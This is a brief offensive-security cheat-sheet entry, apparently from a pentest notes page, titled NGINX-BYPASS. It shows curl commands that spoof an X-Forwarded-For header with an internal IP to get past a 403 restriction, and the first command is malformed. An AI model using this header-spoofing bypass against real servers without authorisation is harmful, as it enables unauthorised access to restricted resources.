NGINX-BYPASS curl -H http://10.194.0.68/.misc/arrow-up-right <----this gives you a 403 forbidden code
curl -H 'X-forwarded-for:10.194.0.67' -I http://10.194.0.68/misc/arrow-up-right <----this may be able to bypass the 403 code because of the x forwarded header :)
Last updated 4 years ago